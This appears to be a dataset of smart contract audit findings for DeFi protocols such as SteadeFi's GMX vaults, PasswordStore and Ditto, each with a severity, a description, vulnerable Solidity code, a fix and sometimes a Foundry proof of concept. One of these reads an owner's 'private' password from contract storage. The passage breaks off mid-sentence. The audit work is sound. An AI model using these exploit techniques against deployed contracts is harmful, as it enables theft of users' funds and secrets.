`GMXOracle` oracle has a function getLpTokenAmount which is in scope. This is Used in keeper script to calculate how much LP tokens for given USD value.\\nThis function returns the `lpTokenAmount` with 30 decimal places instead of 18 as the function assumes.\\nLets look at the function getLpTokenAmount\\n```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n\\nSAFE_MULTIPLIER is in 18 decimal places.\\nThe values returned from the function `_lpTokenValue` is in 18 decimal places. Refer the line\\nSo the final returned value from the function `getLpTokenAmount` is (1e30 * 1e18) / 1e18 = 1e30
GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.\\nUpdate the function `getLpTokenAmount` as shown below.\\n```\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue; ------ remove\\n\\n return (givenValue * SAFE_MULTIPLIER) / (_lpTokenValue * 1e12); ---- add\\n \\n }\\n```\\n
Overestimating the lpToken amount for the given USD value.
```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n
`Chainlink.latestRoundData()` may return stale results
low
The `_getChainlinkResponse()` function is used to get the price of tokens, the problem is that the function does not check for stale results.\\nThe `ChainlinkOracle._getChainlinkResponse()` function is used to get latest Chainlink response.\\n```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n\\nThe problem is that there is not check for stale data. There are some reasons that the price feed can become stale.
Read the updatedAt return value from the `Chainlink.latestRoundData()` function and verify that is not older than than specific time tolerance.\\n```\\nrequire(block.timestamp - udpatedData < toleranceTime, "stale price");\\n```\\n
Since the token prices are used in many contracts, stale data could be catastrophic for the project.
```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n
USDC is not valued correctly in case of a depeg, which causes a loss of funds
low
USDC is not valued correctly in case of a depeg, which causes a loss of funds.\\nThe protocol uses a chainlink feed to get prices of a specific token. In this case the token of interest is USDC which is a stable coin. Let us get some context for this issue, from the GMX V2 documentation we can read the following:\\nIn case the price of a stablecoin depegs from 1 USD: To ensure that profits for all short positions can always be fully paid out, the contracts will pay out profits in the stablecoin based on a price of 1 USD or the current Chainlink price for the stablecoin, whichever is higher. For swaps using the depegged stablecoin, a spread from 1 USD to the Chainlink price of the stablecoin will apply. If Chainlink Data Stream prices are used then the spread would be from the data stream and may not be to 1 USD.\\nhttps://gmx-docs.io/docs/trading/v2\\nFrom the above snippet we now know that gmx will never value USDC below 1$ when closing a short or withdrawing from a position, and that gmx uses the spread from 1 usd to the chainlink price is used. The problem here is that Steadefi does not account for this and will continue to use the chainlink price of usdc in a withdraw and swap when calculating the appropriate slippage amount. Let me demonstrate.\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nHere consult calls `_getChainlinkResponse(_feed)` which gets the current value of a token, for our purpose this token is USDC. The problem begins because consult is called by `consultIn18Decimals` and this is called by `convertToUsdValue`, this is then called by `calcMinTokensSlippageAmt`. This function decides how much slippage is appropriate given the value of the asset being withdrawn. The problems is, as i showed, it will use chainlink value of USDC and in case of a depeg, it will use the depegged value. But as i have shown from gmx docs, when withdrawing, the value of USDC will always be valued at 1 or higher. So now we are calculating slippage for a usdc value that is depegged when we are withdrawing on gmx with the pegged assets normal value.\\nFor example\\nthere is a depeg of usdc\\nusdc chainlink value is $ 0.4\\ngmx withdraw value is always $1\\nbecause we use the chainlink value to calc slippage tolerance, we will be using the slippage tolerance for a USDC price of 0.4 when in fact we are valuing USDC at $1 in gmx. The amount of slippage allowed will be very incorrect and in some cases extreme. In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.
implement logic specific to stablecoins to handle depegs events. Such would be to always value stable coins at the maximum of the stablecoing proposed value and the chainlink response value. Currently we are only using the chainlink response answer to valuate stable coins like usdc, and as i have explained this is a problem.
In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.
```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n
Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced
medium
Whenever A user deposits tokens to vault, vault create a leverage position depending[delta or delta neutral] in the GMX POOl. performing a proportional deposit is not optimal in every case and depositng tokens in such case will result in fewer LP tokens due to sub optimal trade. Eventually leading to a loss of gain for the strategy vault\\nAlice deposits token A() into the vault to make Delta.Neutral position\\n```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n\\nvault refer to deposit to GMXDeposit library to execute the further logic\\n```\\nFile: GMXDeposit.sol\\n\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n[// rest of code// rest of code// rest of code// rest of code// rest of code.]\\n // Borrow assets and create deposit in GMX\\n (\\n uint256 _borrowTokenAAmt,\\n uint256 _borrowTokenBAmt\\n ) = GMXManager.calcBorrow(self, _dc.depositValue);\\n\\n [// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L54\\nwhich calls calcBorrow on GMXManager Library for borrowing assets and making the position IN GMX POOL\\n```\\nFile: GMXManager.sol\\n\\n /**\\n * @notice Calculate amount of tokenA and tokenB to borrow\\n * @param self GMXTypes.Store\\n * @param depositValue USD value in 1e18\\n */\\n function calcBorrow(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n ) external view returns (uint256, uint256) {\\n // Calculate final position value based on deposit value\\n uint256 _positionValue = depositValue * self.leverage / SAFE_MULTIPLIER;\\n\\n // Obtain the value to borrow\\n uint256 _borrowValue = _positionValue - depositValue;\\n\\n uint256 _tokenADecimals = IERC20Metadata(address(self.tokenA)).decimals();\\n uint256 _tokenBDecimals = IERC20Metadata(address(self.tokenB)).decimals();\\n uint256 _borrowLongTokenAmt;\\n uint256 _borrowShortTokenAmt;\\n\\n [// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code..]\\n\\n // If delta is neutral, borrow appropriate amount in long token to hedge, and the rest in short token\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n // Get token weights in LP, e.g. 50% = 5e17\\n (uint256 _tokenAWeight,) = GMXReader.tokenWeights(self);\\n\\n // Get value of long token (typically tokenA)\\n uint256 _longTokenWeightedValue = _tokenAWeight * _positionValue / SAFE_MULTIPLIER;\\n\\n // Borrow appropriate amount in long token to hedge\\n _borrowLongTokenAmt = _longTokenWeightedValue * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenA), 10**(_tokenADecimals))\\n / (10 ** (18 - _tokenADecimals));\\n\\n // Borrow the shortfall value in short token\\n _borrowShortTokenAmt = (_borrowValue - _longTokenWeightedValue) * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenB), 10**(_tokenBDecimals))\\n / (10 ** (18 - _tokenBDecimals));\\n }\\n[// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXManager.sol#L70\\nHere it consider the current reserve ratio of the pool and deposits in the same ratio.\\nWhile GMX docs clearly state that If deposits try to create balance in the pool[depositing in such way which will make actual token weight of index Token towards the TOKEN_WEIGHT defined in the pool] will get benefit technically more LP tokens and oppose to this less LP token if current deposits imbalance the Pool reserve the ratio Reference\\nEven Curve pools work in the same way. Depositer get benefit if they try to balance the pool reserve making them optimal
Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced\\nconsider implementing check and if the pool is imablanced depositing(making levearge position) towards balancing the Index Token's weight will give optimal returns[extra LP tokens ]
It is clear that Weight of index token will not be always near equal to the Defined Total_Weight of the Pool. So if the pool is imbalanced Depositing into GMXPool will not give optimal returns( resulting in fewer LP token), eventually leading to the loss of gain for the depositers affecting net APR
```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n
The `svTokenValue` function can return overestimated value of each strategy vault share token
medium
The `GMXReader.svTokenValue` function can return overestimated value of each strategy vault share token due to outdated `totalSupply`, i.e. without including pending management fees for a long period. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about shares value.\\nThe `svTokenValue` function calculates the value of each strategy vault share token with the current amount of `totalSupply`, which may not include pending management fees:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n\\nSo the returned share value will be overestimated. The longer the period since the last `mintFee` was called the more overestimated shares value is.
Consider adding `pendingFee` to the totalSupply:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n// Remove the line below\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n// Add the line below\\n return equityValue_ * SAFE_MULTIPLIER / (totalSupply_ // Add the line below\\n pendingFee(self));\\n } \\n```\\n
The `GMXReader.svTokenValue` function returns an overestimated value of the share token. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about the shares value.\\nTools used\\nManual Review
```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n
The `afterWithdrawChecks` applies only if user wants to withdraw in tokenA/B
high
The `afterWithdrawChecks` check is very important to be sure that important health parameters are in the proper ranges. But the check is inside brackets of the `if user wants to withdraw in tokenA/B` statement. So if the user wants to withdraw LP-token the check is not provided. This can cause unexpected financial losses.\\nThe `afterWithdrawChecks` check is placed inside the brackets of the if-statement of the `GMXProcessWithdraw.processWithdraw` function. This statement checks `if user wants to withdraw in tokenA/B`. In other cases the `afterWithdrawChecks` check is not provided but should.\\n```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n
I suppose that the check should be placed after the if statement brackets.
The issue can cause unexpected financial losses.\\nTools used\\nManual Review
```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n
Owner's password stored in the `s_password` state variable is not a secret and can be seen by everyone
high
The protocol is using a `private` state variable to store the owner's password under the assumption that being a "private" variable its value is a secret from everyone else except the owner; which is a completely false assumption.\\nIn Solidity, marking a variable as `private` doesn't mean that the data stored in that variable is entirely secret or `private` from all observers of the blockchain. While it restricts direct external access to the variable from other contracts, it's essential to understand that the data on the blockchain is inherently transparent and can be viewed by anyone. Other smart contracts and blockchain explorers can still access and read the data if they know where to look.\\n'Private' in Solidity primarily provides encapsulation and access control within the contract itself, rather than offering complete data privacy on the public blockchain.\\n```\\nstring private s_password;\\n```\\n\\nAforementioned is the `s_password` variable which is being assumed as a secret by the protocol for it being a `private` variable. This is a completely false assumption since all data on the blockchain is public.\\nActors:\\nAttacker: Any non-owner malicious actor on the network.\\nVictim: Owner of the PasswordStore protocol.\\nProtocol: PasswordStore is meant to allow only the owner to store and retrieve their password securely.\\nWorking Test Case:\\n(Note : Though the following code fetches the Victim's password correctly in ASCII format; with my current skills in Solidity I've been struggling to make the `assertEq()` function return `true` when comparing the two strings. The problem seems to be with how the result of `abi.encodePacked()` for `anyoneCanReadPassword` variable fetched from `vm.load` has a bunch of trailing zeroes in it while the same for `victimPassword` doesn't.\\nTherefore my current POC proves the exploit by using `console.log` instead of `assertEq` )\\nWrite and run the following test case in the `PasswordStore.t.sol` test file.\\n```\\nfunction test_any_non_owner_can_see_password() public {\\n string memory victimPassword = "mySecretPassword"; // Defines Victim's (Owner's) password\\n vm.startPrank(owner); // Simulates Victim's address for the next call\\n passwordStore.setPassword(victimPassword); // Victim sets their password\\n\\n // At this point, Victim thinks their password is now "privately" stored on the protocol and is completely secret.\\n // The exploit code that now follows can be performed by just about everyone on the blockchain who are aware of the Victim's protocol and can access and read the Victim's password.\\n\\n /////////// EXPLOIT CODE performed by Attacker ///////////\\n\\n // By observing the protocol's source code at `PasswordStore.sol`, we notice that `s_password` is the second storage variable declared in the contract. Since storage slots are alloted in the order of declaration in the EVM, its slot value will be '1'\\n uint256 S_PASSWORD_STORAGE_SLOT_VALUE = 1;\\n\\n // Access the protocol's storage data at slot 1\\n bytes32 slotData = vm.load(\\n address(passwordStore),\\n bytes32(S_PASSWORD_STORAGE_SLOT_VALUE)\\n );\\n\\n // Converting `bytes` data to `string`\\n string memory anyoneCanReadPassword = string(\\n abi.encodePacked(slotData)\\n );\\n // Exposes Victim's password on console\\n console.log(anyoneCanReadPassword);\\n}\\n```\\n\\nMake sure to run the test command with `-vv` flag to see the `Logs` in command output.
All data on the blockchain is public. To store sensitive information, additional encryption or off-chain solutions should be considered. Sensitive and personal data should never be stored on the blockchain in plaintext or weakly encrypted or encoded format.
This vulnerability completely compromises the confidentiality of the protocol and exposes the sensitive private data of the owner of the protocol to everyone on the blockchain.
```\\nstring private s_password;\\n```\\n
No check if bridge already exists
low
In the current `createBridge` function of the OwnerFacet.sol contract, a critical check to verify if the bridge already exists is missing. This omission can potentially result in double accounting in the yield generation process.\\nIn the rest of the OwnerFacet.sol contract functionality, there are checks in place to prevent the recreation of Vaults or Markets. However, this essential check is absent in the `createBridge()` function. The absence of this check can lead to the unintended creation of duplicate bridges, resulting in double accounting of yield if multiple vaults utilize the same bridge more than once. You can find the missing check in the code here: Link to code.\\nThe potential for double accounting of yield is evident in the following code block:\\n```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo demonstrate this behavior, a simple Proof of Concept (PoC) was created. (The test was placed in the Yield.t.sol file.)\\n```\\nfunction test_double_bridge_push() public {\\n vm.prank(owner);\\n diamond.createBridge(_bridgeReth, Vault.CARBON, 0, 0);\\n diamond.getUndistributedYield(Vault.CARBON); \\n assert(diamond.getUndistributedYield(Vault.CARBON) > 0); // As no yield was generated, this should not be true, but in current situation, it is a proof of double accounting.\\n}\\n```\\n
No check if bridge already exists\\nTo address this vulnerability, it is recommended to add the following mitigation to the createBridge function:\\n```\\n// rest of code\\n// Add the line below\\n for (uint i = 0; i < s.vaultBridges[vault].length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (s.vaultBridges[vault][i] == bridge) {\\n// Add the line below\\n revert Errors.BridgeAlreadyExist();\\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n\\nThis change will prevent the inadvertent creation of duplicate bridges and mitigate the risk of double accounting of yield.
In specific circumstances, if a DAO proposal is confirmed, it could inadvertently trigger the creation of a bridge with the same address for a vault that already uses it. This scenario can lead to double accounting of yield and, as a consequence, potentially expose the protocol to vulnerabilities such as Denial of Service and yield theft.\\nHowever, it's important to note that the likelihood of this issue occurring is relatively low, and the function is governed by the DAO. After discussing this with the sponsor, we have classified this finding as low severity.
```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n
Loss of precision in `twapPriceInEther` due to division before multiplication
low
When calculating `twapPriceInEther`, `twapPrice` is divided by 1e6 before multiplication with 1e18 is done.\\n```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L64-L85\\nAccording to the above calculation, the `twapPrice` obtained would be precise upto 6 decimal places. Performing division before multiplying with 1e18 will result in loss of this precision and.\\nExample Scenario\\n```\\ntwapPrice = 1902501929\\ntwapPriceInEther = 1902000000000000000000\\n\\n// if multiplication is performed earlier,\\ntwapPriceInEther = 1902501929000000000000\\n```\\n
Perform the multiplication before division.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibOracle.sol b/contracts/libraries/LibOracle.sol\\nindex 23d1d0a..6962ad7 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibOracle.sol\\n@@ // Remove the line below\\n82,7 // Add the line below\\n82,7 @@ library LibOracle {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n// Remove the line below\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n uint256 twapPriceInEther = (twapPrice * 1 ether) / Constants.DECIMAL_USDC;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n```\\n
Price used can have -1 (in 18 decimals) difference from the original price.
```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n
`onERC721Received()` callback is never called when new tokens are minted in Erc721Facet.sol
low
The ERC721Facet contract does not properly call the corresponding callback when new tokens are minted. The ERC721 standard states that the onERC721Received callback must be called when a mint or transfer operation occurs. However, the smart contracts interacting as users with `Erc721Facet.mintNFT()` will not be notified with the onERC721Received callback, as expected according to the ERC721 standard.\\n`onErc721Received()` isn't called on minting:\\n```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n
Call `onErc721Received()`
It can create interoperability issues with users' contracts
```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n
[L-4] Yield update will not happen at the 1k ETH threshold
low
Yield updates happen for a vault when the `BRIDGE_YIELD_UPDATE_THRESHOLD` is met for the vault after a large bridge deposit. The `maybeUpdateYield` function handles this logic for updates when that happens (1000 ETH to be exact).\\nThreshold constant from:\\n```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n\\n```\\nFILE: 2023-09-ditto/contracts/facets/BridgeRouterFacet.sol\\n\\nfunction maybeUpdateYield(uint256 vault, uint88 amount) private {\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (\\n zethTotal > Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n && amount.div(zethTotal) > Constants.BRIDGE_YIELD_PERCENT_THRESHOLD\\n ) { // @audit should be >= to account for when threshold is met\\n // Update yield for "large" bridge deposits\\n vault.updateYield();\\n }\\n }\\n```\\n
Change the `>` operand in the `maybeUpdateYield` function to be `>=`.
In reality the yield update for the vault will not happen in the instances of 1000 ETH deposits unless the bridge deposit amount into the vault is > 1000 ETH and the percent is greater than 1%.
```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n
If the dao removes a bridge, user's deposited tokens for that bridge will be lost.
low
If the dao removes a bridge for any (non-malicious) reason, user's deposited tokens for that bridge will be lost.\\nIn the `OwnerFacet.sol` the dao of the system has the option to remove a bridge by calling the `deleteBridge()` function. There is no check if there are any assets in the bridge. Also users may deposit funds in the bridge during the voting period.\\nPOC Add the following function in the `BridgeRouter.t.sol`\\n```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log("Sender ethEscrowed in vault 2 before deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log("Sender ethEscrowed in vault2 after deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log("Sender ethEscrowed after withdraw: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n\\nIn order to run this test, you also have to add\\n```\\n rethA.approve(\\n _bridgeRethToBeDeleted,\\n 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\\n );\\n```\\n\\nto `setUp()` function of the `BridgeROuter.t.sol` contract\\nIn `DeployHelper.sol` another bridge and vault have to be added in order for the test to run:\\n```\\n/// INFO: added by auditor\\n IBridge public bridgeRethToBeDeleted;\\n address public _bridgeRethToBeDeleted;\\n IAsset public zethToBeDeletedVault;\\n address public _zethToBeDeletedVault;\\n IRocketStorage public rocketStorageA;\\n address public _rocketStorageA;\\n IRocketTokenRETH public rethA;\\n address public _rethA;\\n```\\n\\nAdd the following to `deployContracts()` function\\n```\\nif (chainId == 31337) {\\n //mocks\\n _immutableCreate2Factory = deployCode("ImmutableCreate2Factory.sol");\\n\\n if (isMock) {\\n _steth = deployCode("STETH.sol");\\n _unsteth = deployCode("UNSTETH.sol", abi.encode(_steth));\\n _rocketStorage = 